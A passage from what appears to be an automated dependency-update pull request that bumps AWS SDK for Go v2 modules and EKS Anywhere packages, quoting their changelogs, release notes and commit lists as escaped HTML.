href=\"https://github.com/aws/aws-sdk-go-v2/commit/bdaead7d2074e479fc56da77491fe65737413664\"\u003e\u003ccode\u003ebdaead7\u003c/code\u003e\u003c/a\u003e upgrade to smithy-go v1.25.1 (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3399\"\u003e#3399\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/008e12cf64f41c37faeb705f6ce4b77471756f9f\"\u003e\u003ccode\u003e008e12c\u003c/code\u003e\u003c/a\u003e Release 2026-04-27\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/ef109d91f0b772aaebc472633edf13ec0fd907ce\"\u003e\u003ccode\u003eef109d9\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/6411e6379e509956413b866481ee2362a7cdfc68\"\u003e\u003ccode\u003e6411e63\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/e5bf970956db306bf7b5b1bdd8ca71e8cca766b5\"\u003e\u003ccode\u003ee5bf970\u003c/code\u003e\u003c/a\u003e Release 2026-04-24\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/bdbb88c9400c80ed2487f7b498a54c6206b5c62a\"\u003e\u003ccode\u003ebdbb88c\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/v1.17.7...credentials/v1.19.16\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/feature/ec2/imds` from 1.15.3 to 1.18.23\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/CHANGELOG.md\"\u003egithub.com/aws/aws-sdk-go-v2/feature/ec2/imds's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003eRelease (2023-05-04)\u003c/h1\u003e\n\u003ch2\u003eGeneral Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDependency Update\u003c/strong\u003e: Updated to the latest SDK module versions\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eModule Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/cloudwatch\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/cloudwatch/CHANGELOG.md#v1260-2023-05-04\"\u003ev1.26.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: Adds support for filtering by metric names in CloudWatch Metric Streams.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/configservice\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/configservice/CHANGELOG.md#v1320-2023-05-04\"\u003ev1.32.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: Updated ResourceType enum with new resource types onboarded by AWS Config in April 2023.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/connect\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/connect/CHANGELOG.md#v1541-2023-05-04\"\u003ev1.54.1\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDocumentation\u003c/strong\u003e: Remove unused InvalidParameterException from CreateParticipant API\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/ecs\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/ecs/CHANGELOG.md#v1270-2023-05-04\"\u003ev1.27.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: Documentation update for new error type NamespaceNotFoundException for CreateCluster and UpdateCluster\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/networkfirewall\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/networkfirewall/CHANGELOG.md#v1280-2023-05-04\"\u003ev1.28.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: This release adds support for the Suricata REJECT option in midstream exception configurations.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/opensearch\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/opensearch/CHANGELOG.md#v1170-2023-05-04\"\u003ev1.17.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: DescribeDomainNodes: A new API that provides configuration information for nodes part of the domain\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/quicksight\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/quicksight/CHANGELOG.md#v1350-2023-05-04\"\u003ev1.35.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: Add support for Topic, Dataset parameters and VPC\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/rekognition\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/rekognition/CHANGELOG.md#v1270-2023-05-04\"\u003ev1.27.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: This release adds a new attribute FaceOccluded. Additionally, you can now select attributes individually (e.g. [\u0026quot;DEFAULT\u0026quot;, \u0026quot;FACE_OCCLUDED\u0026quot;, \u0026quot;AGE_RANGE\u0026quot;] instead of [\u0026quot;ALL\u0026quot;]), which can reduce response time.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/s3\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/s3/CHANGELOG.md#v1331-2023-05-04\"\u003ev1.33.1\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDocumentation\u003c/strong\u003e: Documentation updates for Amazon S3\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/sagemaker\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/sagemaker/CHANGELOG.md#v1770-2023-05-04\"\u003ev1.77.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: We added support for ml.inf2 and ml.trn1 family of instances on Amazon SageMaker for deploying machine learning (ML) models for Real-time and Asynchronous inference. You can use these instances to achieve high performance at a low cost for generative artificial intelligence (AI) models.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/securityhub\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/securityhub/CHANGELOG.md#v1310-2023-05-04\"\u003ev1.31.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: Add support for Finding History.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/sqs\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/sqs/CHANGELOG.md#v1210-2023-05-04\"\u003ev1.21.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: This release enables customers to call SQS using AWS JSON-1.0 protocol.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease (2023-05-03)\u003c/h1\u003e\n\u003ch2\u003eModule Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/appsync\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/appsync/CHANGELOG.md#v1200-2023-05-03\"\u003ev1.20.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: Private API support for AWS AppSync. With Private APIs, you can now create GraphQL APIs that can only be accessed from your Amazon Virtual Private Cloud (\u0026quot;VPC\u0026quot;).\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/ec2\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/ec2/CHANGELOG.md#v1960-2023-05-03\"\u003ev1.96.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: Adds an SDK paginator for GetNetworkInsightsAccessScopeAnalysisFindings\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/inspector2\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/inspector2/CHANGELOG.md#v1120-2023-05-03\"\u003ev1.12.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: This feature provides deep inspection for linux based instance\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/iottwinmaker\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/iottwinmaker/CHANGELOG.md#v1120-2023-05-03\"\u003ev1.12.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: This release adds a field for GetScene API to return error code and message from dependency services.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/networkfirewall\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/networkfirewall/CHANGELOG.md#v1270-2023-05-03\"\u003ev1.27.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: AWS Network Firewall now supports policy level HOME_NET variable overrides.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/opensearch\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/opensearch/CHANGELOG.md#v1160-2023-05-03\"\u003ev1.16.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: Amazon OpenSearch Service adds the option to deploy a domain across multiple Availability Zones, with each AZ containing a complete copy of data and with nodes in one AZ acting as a standby. This option provides 99.99% availability and consistent performance in the event of infrastructure failure.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/wellarchitected\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/wellarchitected/CHANGELOG.md#v1200-2023-05-03\"\u003ev1.20.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: This release deepens integration with AWS Service Catalog AppRegistry to improve workload resource discovery.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease (2023-05-02)\u003c/h1\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/ae835ecd4db83e5aff241520ec643afba522d704\"\u003e\u003ccode\u003eae835ec\u003c/code\u003e\u003c/a\u003e Release 2023-05-04\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/ef7f367760339dbf8f4bb7c81dbb86b1561b3a9e\"\u003e\u003ccode\u003eef7f367\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/a62e494fe82709dd82ae4ce6d5a5a6a45287c45a\"\u003e\u003ccode\u003ea62e494\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/833592fbe1a37f1cfd8b7b7062473c7cc6a97859\"\u003e\u003ccode\u003e833592f\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/829131feddac6a2fa54ea0050ed7d8c97a29cdd7\"\u003e\u003ccode\u003e829131f\u003c/code\u003e\u003c/a\u003e Add SQSCustomizations (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/2108\"\u003e#2108\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/9d08e7dc2f051ac9c83deca2c548c1d4c3373cdb\"\u003e\u003ccode\u003e9d08e7d\u003c/code\u003e\u003c/a\u003e Release 2023-05-03\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/cec4d55d05fbd0bddff916f426901097073068a6\"\u003e\u003ccode\u003ecec4d55\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/f558c81e77f42988da4fe0d0aee4be0294a50a8b\"\u003e\u003ccode\u003ef558c81\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/8d2e554da1d221c2c1a541a78c729a3f564e8849\"\u003e\u003ccode\u003e8d2e554\u003c/code\u003e\u003c/a\u003e Release 2023-05-02\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/312e442dc8e12c6cb311e8ac5fcb5560eb4bcee1\"\u003e\u003ccode\u003e312e442\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/config/v1.15.3...config/v1.18.23\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/service/ec2` from 1.167.1 to 1.301.0\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/e5c93f424528436a368e9ba357814f744130add0\"\u003e\u003ccode\u003ee5c93f4\u003c/code\u003e\u003c/a\u003e Release 2026-05-07\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/33e133f4f141e743592571ef6f1eba8de7a46e57\"\u003e\u003ccode\u003e33e133f\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/6407448fca2964df58514c64f7fc5cf3d7a9c91e\"\u003e\u003ccode\u003e6407448\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/5c061151aa35d815397875ee47d78353b8b4fcf1\"\u003e\u003ccode\u003e5c06115\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/84ddd08980744ac0f3bacfe7d2796c861671accc\"\u003e\u003ccode\u003e84ddd08\u003c/code\u003e\u003c/a\u003e Release 2026-05-06\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/23645b402c11575a32d1af93ec237f2f121dd285\"\u003e\u003ccode\u003e23645b4\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/848eb597bd63cb770bcd11ee230f9dca68ce1ffe\"\u003e\u003ccode\u003e848eb59\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/1d7b13420ed32f0809a5a4a35c630d19bfd0b6d4\"\u003e\u003ccode\u003e1d7b134\u003c/code\u003e\u003c/a\u003e Release 2026-05-05\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/5bbbc97fcab2086757060561ccd1f34101ba7b57\"\u003e\u003ccode\u003e5bbbc97\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/8dbb93618325675f55eb0c3eb0c7a766806dadbc\"\u003e\u003ccode\u003e8dbb936\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/service/ec2/v1.167.1...service/ec2/v1.301.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/service/ecr` from 1.27.4 to 1.57.2\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/9bd153c05150d0c3f9d45f5b9353c34df9bab5b5\"\u003e\u003ccode\u003e9bd153c\u003c/code\u003e\u003c/a\u003e Release 2025-03-04.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/b967446708e597c3c22c658d8399d11accc9e1f1\"\u003e\u003ccode\u003eb967446\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/188c52a1f53d95e7f99ce0edc73059ce5d0b803c\"\u003e\u003ccode\u003e188c52a\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/defaf5c13afed6bb77e2ee4fafea2bfcd09cea88\"\u003e\u003ccode\u003edefaf5c\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/8f2dd23c2630bd2ee667a403cf8ea8611c5ce406\"\u003e\u003ccode\u003e8f2dd23\u003c/code\u003e\u003c/a\u003e add test that verifies SRA order of operations (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3025\"\u003e#3025\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/3d547b010751de5a834a749ffdaddff4bcb0d39c\"\u003e\u003ccode\u003e3d547b0\u003c/code\u003e\u003c/a\u003e Release 2025-03-04\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/554a1497dc16d385e62514b10bc8adacfbd6a8d0\"\u003e\u003ccode\u003e554a149\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/3abb221732b42d61c95f5306f528cc2182d37c7a\"\u003e\u003ccode\u003e3abb221\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/95ae39d57f8d986f691754737311102335039848\"\u003e\u003ccode\u003e95ae39d\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/c62ec38df6cc8e66ecf014365d8bd15c2599bc6d\"\u003e\u003ccode\u003ec62ec38\u003c/code\u003e\u003c/a\u003e create kitchen sink test service (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3023\"\u003e#3023\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/config/v1.27.4...service/ssm/v1.57.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/eks-anywhere-packages` from 0.4.5 to 0.4.15\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/aws/eks-anywhere-packages/releases\"\u003egithub.com/aws/eks-anywhere-packages's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev0.14.0\u003c/h2\u003e\n\u003ch2\u003eController\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdd registry mirror support for curated packages\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eCLI\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eNew Command: \u003ccode\u003eeksctl anywhere copy packages\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/aws/eks-anywhere/pull/4420\"\u003eaws/eks-anywhere#4420\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev0.13.0\u003c/h2\u003e\n\u003ch2\u003eController\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdd support for Create Namespace during package creation.\u003c/li\u003e\n\u003cli\u003eAdded Harbor support for import/download images command to EKS-A Packages.\u003c/li\u003e\n\u003cli\u003eFixed bug where PackageBundle version was incremented without changes sometimes.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ePackages\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdded Prometheus Package\u003c/li\u003e\n\u003cli\u003eAdded New Helm Chart CRD Package for Emissary for improved upgrade flow, and support multiple instances of the package.\u003c/li\u003e\n\u003cli\u003eUpdated Emissary Package to version 3.3.0\u003c/li\u003e\n\u003cli\u003eUpdated Metallb Package to version to 0.13.7\nUpdated ADOT Package to version 0.23.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev0.12.0\u003c/h2\u003e\n\u003ch2\u003eGeneral\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMoved to Go version 1.18\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eController\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdd EKS Anywhere Packages support for remote management on workload clusters.\u003c/li\u003e\n\u003cli\u003eFixed Update Available not showing on PackageBundle list.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ePackages\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdded New Helm Chart CRD Package for Metallb for improved upgrade flow\u003c/li\u003e\n\u003cli\u003eAdded Cert Manager Package\u003c/li\u003e\n\u003cli\u003eAdded AWS Distro for OpenTelemetry Package (ADOT)\u003c/li\u003e\n\u003cli\u003eAdded Metrics Server Package\u003c/li\u003e\n\u003cli\u003eAdded Cluster Autoscaler Package\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev0.11.0\u003c/h2\u003e\n\u003ch2\u003eController\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdded webhook to provide schema validation for packages\u003c/li\u003e\n\u003cli\u003eAdded support for gated packages\u003c/li\u003e\n\u003cli\u003eAdded active bundle validation for packagebundles\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eCLI\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eSupport for configurations from \u003ccode\u003egenerate packages\u003c/code\u003e has been removed\u003c/li\u003e\n\u003cli\u003eSupport for gated packages\u003c/li\u003e\n\u003cli\u003eRemoved feature flag from curated packages installation\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ePackages\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdded Emmisary package\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev0.10.0\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eController\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdded support for configurations, and images in PackageBundle.\u003c/li\u003e\n\u003cli\u003eRemove registry from PackageBundle and updates sourceRegistry during cluster creation.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/eks-anywhere-packages/commit/afbcc9b196cf4d5988ddfb8f0133a2c1821821eb\"\u003e\u003ccode\u003eafbcc9b\u003c/code\u003e\u003c/a\u003e Faster retries during initial ecr credential injection (\u003ca href=\"https://redirect.github.com/aws/eks-anywhere-packages/issues/1262\"\u003e#1262\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/eks-anywhere-packages/commit/01d4d5aff3e12dd6cc645cdb4126b8f2f5b8233c\"\u003e\u003ccode\u003e01d4d5a\u003c/code\u003e\u003c/a\u003e skip validation for package controller package (\u003ca href=\"https://redirect.github.com/aws/eks-anywhere-packages/issues/1261\"\u003e#1261\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/eks-anywhere-packages/commit/317ca7eac8e949690a10dc6e8ec9e3b24f6a4a67\"\u003e\u003ccode\u003e317ca7e\u003c/code\u003e\u003c/a\u003e Revert pkg-ctlr cert private key rotation policy to Never (\u003ca href=\"https://redirect.github.com/aws/eks-anywhere-packages/issues/1260\"\u003e#1260\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/eks-anywhere-packages/commit/b0bccf64eec3527271e4fa70616b39a6ff33b816\"\u003e\u003ccode\u003eb0bccf6\u003c/code\u003e\u003c/a\u003e Bump dev bundle to latest versions (\u003ca href=\"https://redirect.github.com/aws/eks-anywhere-packages/issues/1259\"\u003e#1259\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/eks-anywhere-packages/commit/583ffe25a954c7b963108009cdcd24ff5cbf8047\"\u003e\u003ccode\u003e583ffe2\u003c/code\u003e\u003c/a\u003e Adds support for k8s 1.35 (\u003ca href=\"https://redirect.github.com/aws/eks-anywhere-packages/issues/1258\"\u003e#1258\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/eks-anywhere-packages/commit/8c8da0328998e796b813e417ed5e720474802ff2\"\u003e\u003ccode\u003e8c8da03\u003c/code\u003e\u003c/a\u003e Update prod bundle for package release (\u003ca href=\"https://redirect.github.com/aws/eks-anywhere-packages/issues/1257\"\u003e#1257\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/eks-anywhere-packages/commit/cfdc201fb58fc4c76b411a0ddeab291e82a4d0a3\"\u003e\u003ccode\u003ecfdc201\u003c/code\u003e\u003c/a\u003e fix adot regression (\u003ca 